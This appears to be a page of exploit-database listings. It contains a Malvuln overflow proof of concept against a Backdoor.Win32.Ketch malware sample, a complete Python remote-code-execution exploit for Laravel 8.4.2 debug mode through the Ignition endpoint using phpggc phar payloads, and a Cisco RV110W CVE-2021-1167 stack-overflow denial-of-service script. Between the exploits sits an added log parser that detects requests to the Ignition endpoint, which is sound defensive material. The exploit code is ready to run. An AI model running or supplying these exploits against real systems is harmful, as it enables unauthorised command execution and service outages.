SYMBOL_STACK_INDEX: 0

SYMBOL_NAME: backdoor_win32_ketch_i+50f9

FOLLOWUP_NAME: MachineOwner

MODULE_NAME: Backdoor_Win32_Ketch_i_ee314e1b913a09ec86c63d7186d8f0b8

IMAGE_NAME: Backdoor.Win32.Ketch.i.ee314e1b913a09ec86c63d7186d8f0b8.exe

DEBUG_FLR_IMAGE_TIMESTAMP: 4021b2e8

STACK_COMMAND: .cxr 000000000019F35C ; kb ; dds 19f7bc ; kb

BUCKET_ID: APPLICATION_FAULT_STACK_OVERFLOW_FILL_PATTERN_41414141_BAD_IP_backdoor_win32_ketch_i+50f9

FAILURE_BUCKET_ID: STACK_OVERFLOW_FILL_PATTERN_41414141_c00000fd_Backdoor.Win32.Ketch.i.ee314e1b913a09ec86c63d7186d8f0b8.exe!Unknown


Exploit/PoC:
python -c "print 'q'*1612" > script.dat
python -m SimpleHTTPServer 80


Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Laravel 8.4.2 Remote Code Execution


Laravel version 8.4.2 suffers from a debug mode remote code execution vulnerability.


MD5 | 777a54e04861b26de13d508208e0dd5b

# Exploit Title: Laravel 8.4.2 debug mode - Remote code execution
# Date: 1.14.2021
# Exploit Author: SunCSR Team
# Vendor Homepage: https://laravel.com/
# References:
# https://www.ambionics.io/blog/laravel-debug-rce
# https://viblo.asia/p/6J3ZgN8PKmB
# Version: <= 8.4.2
# Tested on: Ubuntu 18.04 + nginx + php 7.4.3
# Github POC: https://github.com/khanhnv-2091/laravel-8.4.2-rce


#!/usr/bin/env python3

import requests, sys, re, os

header={
    "Accept": "application/json"
}

data = {
    "solution":"Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",\
    "parameters":{
        "variableName":"cm0s",
        "viewFile":""
    }
}

def clear_log(url='', viewFile=''):

    global data

    data['parameters']['viewFile'] = viewFile
    while (requests.post(url=url, json=data, headers=header, verify=False).status_code != 200): pass
    requests.post(url=url, json=data, headers=header, verify=False)
    requests.post(url=url, json=data, headers=header, verify=False)

def create_payload(url='', viewFile=''):

    global data

    data['parameters']['viewFile'] = viewFile
    resp = requests.post(url=url, json=data, headers=header, verify=False)
    if resp.status_code == 500 and f'file_get_contents({viewFile})' in resp.text:
        return True
    return False

def convert(url='', viewFile=''):

    global data

    data['parameters']['viewFile'] = viewFile
    resp = requests.post(url=url, json=data, headers=header, verify=False)
    if resp.status_code == 200:
        return True
    return False

def exploited(url='', viewFile=''):

    global data

    data['parameters']['viewFile'] = viewFile
    resp = requests.post(url=url, json=data, headers=header, verify=False)
    if resp.status_code == 500 and 'cannot be empty' in resp.text:
        m = re.findall(r'\{(.|\n)+\}((.|\n)*)', resp.text)
        print()
        print(m[0][1])

def generate_payload(command='', padding=0):
    if '/' in command:
        command = command.replace('/', '\/')
    command = command.replace('\'', '\\\'')
    os.system(r'''php -d'phar.readonly=0' ./phpggc/phpggc monolog/rce1 system '%s' --phar phar -o php://output | base64 -w0 | sed -E 's/./\0=00/g'> payload.txt'''%(command))
    payload = ''
    with open('payload.txt', 'r') as fp:
        payload = fp.read()
    payload = payload.replace('==', '=3D=')
    for i in range(padding):
        payload += '=00'
    os.system('rm -rf payload.txt')
    return payload


def main():

    if len(sys.argv) < 4:
        print('Usage: %s url path-log command\n'%(sys.argv[0]))
        print('\tEx: %s http(s)://pwnme.me:8000 /var/www/html/laravel/storage/logs/laravel.log \'id\''%(sys.argv[0]))
        exit(1)

    if not os.path.isfile('./phpggc/phpggc'):
        print('Phpggc not found!')
        print('Run command: git clone https://github.com/ambionics/phpggc.git')
        os.system('git clone https://github.com/ambionics/phpggc.git')

    url = sys.argv[1]
    path_log = sys.argv[2]
    command = sys.argv[3]
    padding = 0

    payload = generate_payload(command, padding)
    if not payload:
        print('Generate payload error!')
        exit(1)

    # Prepend a scheme if none was given, then append the Ignition endpoint in both cases
    if not url.startswith('http'):
        url = 'http://' + url
    url = url + '/_ignition/execute-solution'

    print('\nExploit...')
    clear_log(url, 'php://filter/write=convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s'%(path_log))
    create_payload(url, 'AA')
    create_payload(url, payload)
    while (not convert(url, 'php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=%s'%(path_log))):
        clear_log(url, 'php://filter/write=convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s'%(path_log))
        create_payload(url, 'AA')
        padding += 1
        payload = generate_payload(command, padding)
        create_payload(url, payload)

    exploited(url, 'phar://%s'%(path_log))

if __name__ == '__main__':
    main()
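
Every step of the exploit above is a POST to the same debug-only Ignition endpoint, repeated until the filter chain answers 200, so the web server's access log is enough to spot it. The detection example below is added here and is not part of the exploit or the SunCSR write-up; it parses constructed combined-format access-log lines (the IPs, timestamps and user agents are constructed sample data) and reports every client that touched `/_ignition/`, with the status codes it received.

```python
import re
from collections import Counter, defaultdict

# Constructed access-log lines (combined format). The POSTs to
# /_ignition/execute-solution mirror the request the exploit above sends in a
# loop; the GET lines are ordinary traffic from another client.
SAMPLE_LOG = """\
203.0.113.7 - - [14/Jan/2021:10:02:11 +0000] "GET /login HTTP/1.1" 200 1523 "-" "Mozilla/5.0"
203.0.113.7 - - [14/Jan/2021:10:02:13 +0000] "POST /_ignition/execute-solution HTTP/1.1" 500 2210 "-" "python-requests/2.25.1"
203.0.113.7 - - [14/Jan/2021:10:02:13 +0000] "POST /_ignition/execute-solution HTTP/1.1" 500 2210 "-" "python-requests/2.25.1"
203.0.113.7 - - [14/Jan/2021:10:02:14 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 12 "-" "python-requests/2.25.1"
198.51.100.4 - - [14/Jan/2021:10:03:01 +0000] "GET /products HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
203.0.113.7 - - [14/Jan/2021:10:02:15 +0000] "POST /_ignition/execute-solution HTTP/1.1" 500 3400 "-" "python-requests/2.25.1"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Ignition's routes exist only for debugging; none of them belong on a production host.
IGNITION_PREFIX = "/_ignition/"


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def ignition_requests(log_text):
    """Every parsed request whose path is under /_ignition/, in log order."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["path"].startswith(IGNITION_PREFIX):
            hits.append(rec)
    return hits


def summarize_by_client(log_text):
    """Per source IP: how many debug-endpoint calls were made and which status codes came back.

    A run of 500s followed by a 200 from one client is the shape of the exploit's
    retry loop: it keeps posting until the php://filter chain returns 200.
    """
    summary = defaultdict(lambda: {"count": 0, "statuses": Counter(), "paths": set()})
    for rec in ignition_requests(log_text):
        entry = summary[rec["ip"]]
        entry["count"] += 1
        entry["statuses"][rec["status"]] += 1
        entry["paths"].add(rec["path"])
    return dict(summary)


def alerts(log_text, threshold=1):
    """One alert string per client that reached the debug endpoint at least `threshold` times."""
    out = []
    for ip, entry in sorted(summarize_by_client(log_text).items()):
        if entry["count"] >= threshold:
            codes = ", ".join("%dx%d" % (c, n) for c, n in sorted(entry["statuses"].items()))
            out.append("%s: %d request(s) to %s (status %s)"
                       % (ip, entry["count"], sorted(entry["paths"]), codes))
    return out


if __name__ == "__main__":
    for line in alerts(SAMPLE_LOG):
        print(line)
```

A single hit on this prefix is already worth an alert: on a correctly deployed Laravel app with debug mode off the route is not served at all.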


Cisco RV110W 1.2.1.7 Denial Of Service


Cisco RV110W version 1.2.1.7 vpn_account denial of service proof of concept exploit.


MD5 | 22bfead549943dbe0007ce4ce4a7b6f5

# Exploit Title: Cisco RV110W 1.2.1.7 - 'vpn_account' Denial of Service (PoC)
# Date: 2021-01
# Exploit Author: Shizhi He
# Vendor Homepage: https://www.cisco.com/
# Software Link: https://software.cisco.com/download/home/283879340/type/282487380/release/1.2.1.7
# Version: V1.2.1.7
# Tested on: RV110W V1.2.1.7
# CVE : CVE-2021-1167
# References:
# https://github.com/pwnninja/cisco/blob/main/vpn_client_stackoverflow.md
# https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-overflow-WUnUgv4U

#!/usr/bin/env python2

#####
## Cisco RV110W Remote Stack Overflow.
### Tested on version: V1.2.1.7 (maybe useable on other products and versions)


import os
import sys
import re
import urllib
import urllib2
import getopt
import json
import hashlib
import ssl

ssl._create_default_https_context = ssl._create_unverified_context

###
# Usage: ./CVE-2021-1167.py 192.168.1.1 443 cisco cisco
# This PoC will crash the target HTTP/HTTPS service
###

#encrypt password
def enc(s):
    l = len(s)
    s += "%02d" % l
    mod = l + 2
    ans = ""
    for i in range(64):
        tmp = i % mod
        ans += s[tmp]
    return hashlib.md5(ans).hexdigest()

if __name__ == "__main__":
    print "Usage: ./CVE-2021-1167.py 192.168.1.1 443 cisco cisco"

    IP = sys.argv[1]
    PORT = sys.argv[2]
    USERNAME = sys.argv[3]
    PASSWORD = enc(sys.argv[4])
    url = 'https://' + IP + ':' + PORT + '/'

    #get session_id by POST login.cgi
    req = urllib2.Request(url + "login.cgi")
    req.add_header('Origin', url)
    req.add_header('Upgrade-Insecure-Requests', 1)
    req.add_header('Content-Type', 'application/x-www-form-urlencoded')
    req.add_header('User-Agent',
                   'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')
    req.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')
    req.add_header('Referer', url)
    req.add_header('Accept-Encoding', 'gzip, deflate')
    req.add_header('Accept-Language', 'en-US,en;q=0.9')
    req.add_header('Cookie', 'SessionID=')
    data = {"submit_button": "login",
            "submit_type": "",
            "gui_action": "",
            "wait_time": "0",
            "change_action": "",
            "enc": "1",
            "user": USERNAME,
            "pwd": PASSWORD,
            "sel_lang": "EN"
            }
    r = urllib2.urlopen(req, urllib.urlencode(data))
    resp = r.read()
    login_st = re.search(r'.*login_st=\d;', resp).group().split("=")[1]
    session_id = re.search(r'.*session_id.*\";', resp).group().split("\"")[1]
    print session_id

    #trigger stack overflow through POST vpn_account parameter and cause denial of service
    req2 = urllib2.Request(url + "apply.cgi;session_id=" + session_id)
    req2.add_header('Origin', url)
    req2.add_header('Upgrade-Insecure-Requests', 1)
    req2.add_header('Content-Type', 'application/x-www-form-urlencoded')
    req2.add_header('User-Agent',
                    'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')
    req2.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')
    req2.add_header('Referer', url)
    req2.add_header('Accept-Encoding', 'gzip, deflate')
    req2.add_header('Accept-Language', 'en-US,en;q=0.9')
    req2.add_header('Cookie', 'SessionID=')
    poc = "a" * 4096
    data_cmd = {
        "gui_action": "Apply",
        "submit_type": "",
        "submit_button": "vpn_client",
        "change_action": "",
        "pptpd_enable": "0",
        "pptpd_localip": "10.0.0.1",
        "pptpd_remoteip": "10.0.0.10-14",
        "pptpd_account": "",
        "vpn_pptpd_account": "1",
        "vpn_account": poc,
        "change_lan_ip": "0",
        "netbios_enable": "0",
        "mppe_disable": "0",
        "importvpnclient": "",
        "browser": "",
        "webpage_end": "1",
    }
    r = urllib2.urlopen(req2, urllib.urlencode(data_cmd))
    resp = r.read()
    print resp
